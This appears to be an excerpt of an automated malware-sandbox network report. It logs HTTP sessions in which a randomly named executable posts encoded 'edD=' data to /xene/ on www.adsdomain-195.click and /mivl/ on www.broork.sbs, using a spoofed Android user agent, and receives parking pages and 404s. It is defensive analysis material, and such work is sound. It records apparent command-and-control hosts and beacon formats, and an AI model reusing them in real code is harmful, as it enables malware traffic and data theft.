                                                                                                                                23192.168.2.849731199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:39.493612051 CET1736OUTPOST /xene/ HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.adsdomain-195.click
                                                                                                                                Referer: http://www.adsdomain-195.click/xene/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6c 53 33 47 75 36 55 41 35 6b 30 46 58 72 30 6b 52 56 43 4e 67 35 70 78 6d 32 63 4c 73 7a 41 66 78 54 42 56 69 49 42 4e 4e 6a 37 74 36 78 55 53 61 2f 31 66 73 62 33 78 79 42 55 50 4d 6d 70 31 37 30 6e 68 2f 41 6b 4e 48 35 57 59 41 67 30 54 64 4f 68 31 64 34 56 47 46 6b 55 49 7a 72 57 71 70 79 67 52 53 6d 67 4e 7a 52 74 46 74 78 47 34 73 76 55 66 44 68 6b 5a 48 68 69 6c 35 34 4c 36 62 73 72 4d 2b 37 73 4d 72 6f 38 4d 47 69 4c 31 71 76 43 44 58 51 76 53 4f 7a 69 38 67 79 41 4b 57 71 6a 46 4f 35 49 48 69 34 31 6f 55 6a 71 6e 58 30 50 72 70 35 6f 59 2f 63 6f 66 58 32 32 35 43 65 50 6c 69 70 70 47 73 59 4b 42 57 30 55 2f 6b 65 65 43 6c 31 55 49 31 43 37 77 32 65 35 46 35 69 38 53 50 4d 78 74 49 65 71 53 51 4d 44 64 38 74 45 31 6a 51 52 6d 52 4c 4c 31 62 56 2b 32 6d 50 35 6c 54 6f 64 73 55 42 53 2f 42 71 61 4c 4e 34 6f 54 4f 65 42 4c 67 36 71 46 73 2b 57 53 59 41 42 63 76 37 35 6e 66 75 44 49 38 38 70 63 39 43 32 70 79 48 78 45 79 6f 2b 46 39 38 64 65 75 69 53 57 33 49 77 56 4d 6e 67 56 34 6c [TRUNCATED]
                                                                                                                                Data Ascii: edD=lS3Gu6UA5k0FXr0kRVCNg5pxm2cLszAfxTBViIBNNj7t6xUSa/1fsb3xyBUPMmp170nh/AkNH5WYAg0TdOh1d4VGFkUIzrWqpygRSmgNzRtFtxG4svUfDhkZHhil54L6bsrM+7sMro8MGiL1qvCDXQvSOzi8gyAKWqjFO5IHi41oUjqnX0Prp5oY/cofX225CePlippGsYKBW0U/keeCl1UI1C7w2e5F5i8SPMxtIeqSQMDd8tE1jQRmRLL1bV+2mP5lTodsUBS/BqaLN4oTOeBLg6qFs+WSYABcv75nfuDI88pc9C2pyHxEyo+F98deuiSW3IwVMngV4lFTFMQzhwdYMNlHZiGhcefd4+FUsfjvHxS07rQNpjz+pPnv/hErcXd134F992MsMkGN3rDlNvdQYREEYIyL2qkJBtC2MvVSW5muFnM/TCSSRZnSf8GVTRWlarL3+kAhcHNo6LF77C6bsUP7rELNiGUq/91bn0obsdlfnQm9ClHVGcGHzGMd4q28FBN4VEpyFPrmqbKOe6n9sQpkP4IJlYdB4Em3T+nR1e9ZVDJP6qWexuBxb3E00lILBdzWBosJLlIkMvIemw/TzDahekc8XpdSl4SUCT664L7Ej4jY8Q8R9uOXEswDI/1Kh0xmksb2rizOiWB9VkEBSH9ffCpAtJnLobXLPvOT8+wTnzwd3J982liFXsQYl2VnEPUHXlpRu9uoKgdd+/uxXPOd0UyWACLpNRDOStPce62psO2LDopgFZSdDG6K0mHj9EzG9mBIErmXm2hnlHc9+Uw3PFT2wOBk+0QJ8tNu+DS/5zSFID4sDf2F0HoVcQogoCOcoZlcjaU+cze1T/vq2pd0grhqme4rNmQoguKz1BWSLXPA1GcJjCuxUvzMX07q7VaVUrvXN832vWbzQMjgL13J6RhX7wLKU3MkMP9wVdQ6dUYSoeABAZNUoUmlrVXWHHP1jtrCDGVH/Vn3E0f9pq+ABeV5w1sO1emt85rSnSrk [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:55:40.087987900 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:39 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1146
                                                                                                                                x-request-id: c88bc650-8b17-4393-abf9-13589ef47222
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==
                                                                                                                                set-cookie: parking_session=c88bc650-8b17-4393-abf9-13589ef47222; expires=Tue, 29 Oct 2024 16:10:39 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 6a 78 64 30 77 34 42 31 73 6c 73 42 4f 35 59 36 36 78 4f 33 6c 4e 37 41 4e 2b 35 59 57 7a 35 56 65 76 58 76 46 4e 62 6a 68 44 37 42 72 34 65 6f 2f 4b 54 73 6e 2f 56 45 36 6a 73 38 70 56 61 52 59 77 52 4b 4b 47 7a 2f 50 64 43 72 79 53 6a 2f 55 4f 42 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:55:40.088025093 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg4YmM2NTAtOGIxNy00MzkzLWFiZjktMTM1ODllZjQ3MjIyIiwicGFnZV90aW1lIjoxNzMwMjE3Mz
                                                                                                                                Oct 29, 2024 16:55:40.088213921 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg4YmM2NTAtOGIxNy00MzkzLWFiZjktMTM1ODllZjQ3MjIyIiwicGFnZV90aW1lIjoxNzMwMjE3Mz


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.849732199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:42.173944950 CET434OUTGET /xene/?mRR=Vxudf0fHzLw84n3P&edD=oQfmtMAR504qWoEoIiuXkIZ390sDtx871CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEvd3KGx73JHR40wuRl04yT55myu+mdIWD34OfxSC3JH3Pw== HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:55:42.781121016 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:42 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1518
                                                                                                                                x-request-id: 9088cb2f-4f78-4c52-9e13-19223909779e
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tAtugdEUnHJx4gSfT/E1vkopTnQvxNIIU0TpU7anfVs20JR2rWYqrh1NcFN0SO9FDTP7m8lupg3e2Oq6sc/Ptw==
                                                                                                                                set-cookie: parking_session=9088cb2f-4f78-4c52-9e13-19223909779e; expires=Tue, 29 Oct 2024 16:10:42 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 41 74 75 67 64 45 55 6e 48 4a 78 34 67 53 66 54 2f 45 31 76 6b 6f 70 54 6e 51 76 78 4e 49 49 55 30 54 70 55 37 61 6e 66 56 73 32 30 4a 52 32 72 57 59 71 72 68 31 4e 63 46 4e 30 53 4f 39 46 44 54 50 37 6d 38 6c 75 70 67 33 65 32 4f 71 36 73 63 2f 50 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tAtugdEUnHJx4gSfT/E1vkopTnQvxNIIU0TpU7anfVs20JR2rWYqrh1NcFN0SO9FDTP7m8lupg3e2Oq6sc/Ptw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:55:42.781181097 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTA4OGNiMmYtNGY3OC00YzUyLTllMTMtMTkyMjM5MDk3NzllIiwicGFnZV90aW1lIjoxNzMwMjE3Mz


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.849733163.44.176.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:48.818051100 CET672OUTPOST /mivl/ HTTP/1.1
                                                                                                                                Host: www.broork.sbs
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.broork.sbs
                                                                                                                                Referer: http://www.broork.sbs/mivl/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 6f 4d 52 77 56 58 46 75 4d 38 75 2f 6b 56 6d 56 37 54 6c 2f 64 65 34 41 43 42 73 58 6e 45 78 67 58 30 36 63 69 4d 72 57 43 78 74 62 61 75 79 47 46 61 31 4c 55 35 41 48 76 6e 38 58 6b 73 33 48 6e 72 51 4e 63 48 4a 6c 56 66 79 31 6c 73 5a 71 35 34 62 77 65 6e 50 4d 53 4b 6c 63 53 55 6d 44 46 75 62 38 63 74 72 50 50 69 47 77 65 4a 44 4f 30 55 57 2b 4e 42 34 6b 75 39 72 4a 70 4b 2b 58 4a 44 39 6f 7a 75 77 71 50 44 70 33 57 4e 51 2b 68 59 71 6d 6e 7a 78 54 35 78 49 49 79 70 7a 4f 53 71 62 6a 5a 30 74 35 6b 51 6e 41 48 57 51 57 6e 2b 4d 55 48 77 4a 53 70 4e 41 3d
                                                                                                                                Data Ascii: edD=AAp9nusr7CDMoMRwVXFuM8u/kVmV7Tl/de4ACBsXnExgX06ciMrWCxtbauyGFa1LU5AHvn8Xks3HnrQNcHJlVfy1lsZq54bwenPMSKlcSUmDFub8ctrPPiGweJDO0UW+NB4ku9rJpK+XJD9ozuwqPDp3WNQ+hYqmnzxT5xIIypzOSqbjZ0t5kQnAHWQWn+MUHwJSpNA=
                                                                                                                                Oct 29, 2024 16:55:49.707384109 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                Connection: close
                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                pragma: no-cache
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 1251
                                                                                                                                date: Tue, 29 Oct 2024 15:55:49 GMT
                                                                                                                                server: LiteSpeed
                                                                                                                                vary: User-Agent
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                                Oct 29, 2024 16:55:49.707557917 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                                Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.849734163.44.176.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:51.359780073 CET692OUTPOST /mivl/ HTTP/1.1
                                                                                                                                Host: www.broork.sbs
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.broork.sbs
                                                                                                                                Referer: http://www.broork.sbs/mivl/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 72 74 68 77 58 77 52 75 4c 63 75 38 68 56 6d 56 69 44 6c 7a 64 65 6b 41 43 45 63 48 6d 79 70 67 58 56 4b 63 6a 4e 72 57 4c 68 74 62 52 4f 79 48 49 36 30 4a 55 35 38 50 76 69 45 58 6b 6f 66 48 6e 71 67 4e 64 77 6c 6d 54 66 79 33 75 4d 5a 73 6b 49 62 77 65 6e 50 4d 53 4b 68 36 53 55 75 44 43 66 72 38 65 49 48 4d 51 53 47 7a 64 4a 44 4f 2b 45 57 36 4e 42 34 57 75 2f 65 73 70 4d 36 58 4a 47 42 6f 79 2f 77 70 57 7a 70 4c 59 74 52 4a 78 36 79 70 69 43 6c 76 6e 51 45 51 78 2f 6a 79 61 38 71 4a 44 57 6c 2f 6e 51 50 72 48 56 34 67 69 4a 52 38 64 54 5a 69 33 61 55 33 78 77 58 4b 46 69 56 6e 71 6e 50 42 2b 64 37 51 52 59 65 45
                                                                                                                                Data Ascii: edD=AAp9nusr7CDMrthwXwRuLcu8hVmViDlzdekACEcHmypgXVKcjNrWLhtbROyHI60JU58PviEXkofHnqgNdwlmTfy3uMZskIbwenPMSKh6SUuDCfr8eIHMQSGzdJDO+EW6NB4Wu/espM6XJGBoy/wpWzpLYtRJx6ypiClvnQEQx/jya8qJDWl/nQPrHV4giJR8dTZi3aU3xwXKFiVnqnPB+d7QRYeE
                                                                                                                                Oct 29, 2024 16:55:52.267349005 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                Connection: close
                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                pragma: no-cache
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 1251
                                                                                                                                date: Tue, 29 Oct 2024 15:55:52 GMT
                                                                                                                                server: LiteSpeed
                                                                                                                                vary: User-Agent
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                                Oct 29, 2024 16:55:52.267368078 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                                Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.849735163.44.176.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:53.905730009 CET1709OUTPOST /mivl/ HTTP/1.1
                                                                                                                                Host: www.broork.sbs
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.broork.sbs
                                                                                                                                Referer: http://www.broork.sbs/mivl/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
